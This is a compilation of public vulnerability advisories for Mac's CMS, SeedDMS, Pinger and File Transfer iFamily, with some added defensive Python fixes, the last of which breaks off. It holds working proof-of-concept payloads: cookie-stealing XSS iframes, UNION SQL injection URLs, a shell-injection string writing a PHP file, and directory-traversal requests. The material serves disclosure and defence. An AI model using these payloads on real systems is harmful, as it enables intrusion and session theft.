The non-persistent cross-site scripting web vulnerability can be exploited by remote attackers without a user account and with low user interaction. For security demonstration or to reproduce the cross-site scripting web vulnerability follow the provided information and steps below to continue.
PoC: Payload
>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0

PoC: Vulnerable Source
<form method="post" action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString" value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source" onload="alert(document.cookie)"></span>

--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865

1.2
The non-persistent cross-site scripting web vulnerability can be exploited by remote attackers without a user account and with low user interaction. For security demonstration or to reproduce the cross-site scripting web vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com


PoC: Vulnerable Source
<form method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/login" class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display: block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword" class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post" action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess" ajaxoutput="#forgotPasswordReturn">
Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user with Email address: test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>


--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; ajaxRequest=true
&=&emailAddress=test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105


1.3
The remote sql injection web vulnerability can be exploited by remote attackers with a privileged application user account and without user interaction.
For security demonstration or to reproduce the sql injection web vulnerability follow the provided information and steps below to continue.
PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--


PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union select 1,2,3,4,@@version--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union select 1,2,3,4,@@version--%20>
</body></head>
</html>


--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1 order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53


--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error - Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';" - Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range - should be between 1 and 5 - 5.0.12 'pwnd
This page was created in 1.5665068626404 seconds


Security Risk:
==============
1.1 & 1.2
The security risk of the client-side cross site scripting web vulnerabilities in the search and email reset function are estimated as medium.
1.3
The security risk of the remote sql injection web vulnerabilities in the id parameters on delete are estimated as high.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com       www.vuln-lab.com                         www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com               infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab            facebook.com/VulnerabilityLab            youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php          vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
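The 1.3 finding above (string-built queries on `roleId` and `userId`, with SQLite errors echoed to the page) as an added illustration, not code from the advisory or from Mac's CMS: a constructed SQLite roles table, the string-built lookup beside a bound-parameter one, and an integer check on the id. Table and column names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the CMS roles table; the real schema is not in the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE roles (roleId INTEGER PRIMARY KEY, name TEXT, level INTEGER)"
    )
    conn.executemany(
        "INSERT INTO roles VALUES (?, ?, ?)",
        [(1, "admin", 10), (2, "editor", 5)],
    )
    return conn


def vulnerable_find_role(conn, role_id):
    """The pattern behind the advisory's SQLSTATE[HY000] log lines: the raw GET
    parameter is pasted into the SQL text, so a quote closes the literal and
    whatever follows is parsed as SQL."""
    sql = "SELECT roleId, name FROM roles WHERE roleId = '%s'" % role_id
    return conn.execute(sql).fetchone()


def probe_vulnerable(conn, role_id):
    """Run the string-built query and report how SQLite reacts: ('row', <row or None>)
    when the statement parses, ('error', <message>) when the injected text breaks it,
    which is what the advisory's error logs show."""
    try:
        return ("row", vulnerable_find_role(conn, role_id))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def valid_role_id(role_id):
    """Server-side type check: an id is a positive integer, nothing else."""
    return isinstance(role_id, str) and role_id.isdigit() and int(role_id) > 0


def find_role(conn, role_id):
    """Hardened lookup: reject non-integer ids, then bind the value as a
    parameter so the driver never treats it as SQL text."""
    if not valid_role_id(role_id):
        return None
    return conn.execute(
        "SELECT roleId, name FROM roles WHERE roleId = ?", (int(role_id),)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    payload = "'-1 order by 5--"          # the advisory's first payload, percent-decoded
    print(probe_vulnerable(db, payload))  # ('error', '1st ORDER BY term out of range ...')
    print(find_role(db, payload))         # None: rejected before it reaches the database
    print(find_role(db, "2"))             # (2, 'editor')
```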
-
SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A

Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2209


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web based user interface. It is based on PHP and MySQL or sqlite3
and runs on Linux, MacOS and Windows. Many years of development have made it a mature, powerful and enterprise ready platform for
sharing and storing documents. It's fully compatible with its predecessor LetoDMS.

(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & https://www.seeddms.org/index.php?id=7 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.
Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, v5.1.16, v5.1.18 and v6.0.7


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting web vulnerabilities have been discovered in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent cross site scripting web vulnerabilities are located in the `name` and `comment` parameters of the `AddEvent.php` file.
Remote attackers are able to add their own event via op.AddEvent with malicious script code. The request method to inject is POST and the
attack vector is located on the application-side. After the injection, the execution occurs in the admin panel within the `Log Management`
- `Webdav` and `Web` views. The content of the comment and name is pushed unescaped into the logs and rendered with an html/js template.
This allows an attacker to exploit the issue remotely with a simple POST injection from outside with lower privileges.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious sources and persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)

Vulnerable Parameter(s):
[+] name
[+] comment

Affected Module(s):
[+] Log Management (out.LogManagement.php)


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments field
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or error
5. Now wait until the administrator previews the web or webdav view function in the log management
6. Successful reproduce of the persistent web vulnerability!
PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog ?logname=20200413.log
Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source" onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>


PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>


--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&comment=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Injection Point via Calendar op.AddEvent Name & Comment


--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Execution Point via Log Management (AP) on Webdav View or Web View


Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=


Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input fields on transmit to sanitize
2. Filter and restrict the input fields of the name and comment parameters for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent the execution point


Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerabilities in the seeddms web-application are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.

--
VULNERABILITY LABORATORY - RESEARCH TEAM
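The injection and execution points described in this advisory, as an added example rather than SeedDMS code: the two entries from the Log Management view are escaped before they are placed in the `<pre>` block (fix point 3), request parameters are percent-encoded when an entry is written (fix point 1), and a scanner flags entries that already carry markup. Function names are my own.

```python
import html
import re
from urllib.parse import urlencode

# The two entries shown in the advisory's Log Management view.
SAMPLE_LOG = [
    'Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog ?logname=20200413.log',
    'Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe src="evil.source" '
    'onload="alert(document.cookie)"></iframe> &comment=<iframe src="evil.source" '
    'onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199',
]


def render_log_html(lines):
    """Execution point fix: escape each entry before it goes into the <pre>
    block, so markup carried by a request parameter is shown as text instead
    of being parsed by the administrator's browser."""
    body = "\n".join(html.escape(line, quote=True) for line in lines)
    return "<pre>" + body + "</pre>"


def format_log_entry(timestamp, level, user, host, op, params):
    """Injection point fix: write request parameters percent-encoded, so the
    log file itself never contains a raw '<', '>' or '"' taken from user input."""
    return "%s [%s] %s (%s) %s ?%s" % (timestamp, level, user, host, op, urlencode(params))


TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z][^>]*>")


def entries_with_markup(lines):
    """Detection pass for logs already on disk: (line number, tag) for every
    HTML tag found, so an administrator can see which entries were poisoned."""
    hits = []
    for number, line in enumerate(lines, 1):
        for match in TAG_RE.finditer(line):
            hits.append((number, match.group(0)))
    return hits


if __name__ == "__main__":
    print(render_log_html(SAMPLE_LOG))
    print(entries_with_markup(SAMPLE_LOG))
    print(format_log_entry("Apr 13 19:29:53", "info", "admin", "localhost",
                           "op.AddEvent", {"name": "<iframe src=evil.source>"}))
```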
-
Pinger 1.0 - Remote Code Execution
# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A

================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================

# Description:
simple, easy to use jQuery frontend to php backend that pings various devices and changes colors from green to red depending on if device is up or down.

# PoC :
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php

# Vulnerable code:
if(isset($_GET['ping'])){
    // if this is ever noticably slower, i'll pass it stuff when called
    // change the good.xml to config.xml, good is what I use at $WORK
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['ping'] == ""){
        $host = "127.0.0.1";
    }else{
        $host = $_GET['ping'];   // user input, taken as-is
    }
    // $host is concatenated straight into the shell command line
    $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout.' '.$host.' | grep received | awk \'{print $4}\''));
    $id = str_replace('.','_',$host);
    if(($out == "1") || ($out == "0")){
        echo json_encode(array("id"=>"h$id","res"=>"$out"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}
if(isset($_GET['socket'])){
    $xml = simplexml_load_file("config.xml");
    //$xml = simplexml_load_file("good.xml");
    if($_GET['socket'] == ""){
        $host = "127.0.0.1 80";
    }else{
        $host = str_replace(':',' ',$_GET['socket']);   // user input, only ':' is rewritten
    }
    // same pattern: $host reaches the shell unescaped
    $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
    $id = str_replace('.','_',$host);
    $id = str_replace(' ','_',$id);
    if(preg_match("/succeeded/",$out)){
        echo json_encode(array("id"=>"h$id","res"=>"1"));
    }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
    }
}
?>
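A hardened counterpart to the two ping.php handlers above, added here as an example and not taken from Pinger: the host is validated as an IP address or hostname before use, ping and nc are started from an argv list with no shell, and the `grep received | awk` pipeline is replaced by a regex over the captured output. Function names and the sample ping output are my own.

```python
import ipaddress
import re
import subprocess

HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_host(host):
    """True only for a literal IP address or an RFC 1123 hostname. Shell
    metacharacters, whitespace and an empty value all fail, so a value such as
    `;echo ...` can never reach a command line."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def ping_argv(host, timeout):
    """argv for the ICMP probe. Passed to subprocess as a list, so the host is
    one argument to ping and is never interpreted by a shell."""
    if not validate_host(host):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-n", "-q", "-c", "1", "-w", str(int(timeout)), host]


def socket_argv(spec, timeout):
    """argv for the nc port probe from a 'host:port' spec: split on the last
    ':' as the original does, but validated instead of handed to the shell."""
    host, sep, port = spec.rpartition(":")
    if not sep or not validate_host(host) or not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError("rejected socket spec: %r" % spec)
    return ["nc", "-v", "-z", "-w", str(int(timeout)), host, port]


RECEIVED_RE = re.compile(r"(\d+) (?:packets )?received")


def received_count(ping_stdout):
    """Python replacement for the `grep received | awk '{print $4}'` pipeline."""
    match = RECEIVED_RE.search(ping_stdout)
    return int(match.group(1)) if match else 0


def ping_result(host, timeout, runner=subprocess.run):
    """Same JSON shape as ping.php produces, built without shell_exec.
    `runner` is injectable so the flow can be exercised offline."""
    argv = ping_argv(host, timeout)
    proc = runner(argv, capture_output=True, text=True)   # no shell=True anywhere
    res = "1" if received_count(proc.stdout) == 1 else "0"
    return {"id": "h" + host.replace(".", "_"), "res": res}


# Constructed iputils output for one successful probe, used by the offline runner.
SAMPLE_PING_OUTPUT = """PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.030/0.030/0.030/0.000 ms
"""


class FakeCompleted:
    """Minimal stand-in for subprocess.CompletedProcess."""
    def __init__(self, stdout):
        self.stdout = stdout


def offline_runner(argv, **kwargs):
    """Returns the sample output instead of executing ping."""
    return FakeCompleted(SAMPLE_PING_OUTPUT)


if __name__ == "__main__":
    print(validate_host("127.0.0.1;id"))                        # False
    print(ping_result("127.0.0.1", 2, runner=offline_runner))   # {'id': 'h127_0_0_1', 'res': '1'}
```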
-
File Transfer iFamily 2.1 - Directory Traversal
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2199


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
Directory- or Path-Traversal


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A complete application to exchange files wirelessly between devices.
It uses the Multipeer Connectivity Framework to search and connect to available devices, without the need of internet connection or any
kind of server and database.

(Copy of the Homepage: https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 iOS mobile application.
Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official File Transfer iFamily v2.1 iOS mobile application.
The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able
to request for example the local ./etc/ path of the web-server by changing the local path in the performed request itself. In a first
request the attacker changes the path, and the host redirects to complete the address with "..". Then the attacker just attaches a final
slash to the request and the path can be accessed via web-browser to download local files.

Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.


Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../


--- PoC Session Logs [GET] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
add slash to correct host address (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and accessible ./etc/ path in the app container.
Disallow path changes in the client-side get method requests and validate them securely.
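The two PoC forms above (the `..` chain and the `//../` variant, beside the legitimate `/./` request), as an added example and not the app's code: a path-containment check of the kind the solution calls for, and a pass over constructed access-log lines to spot the same requests after the fact. The share root directory is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote

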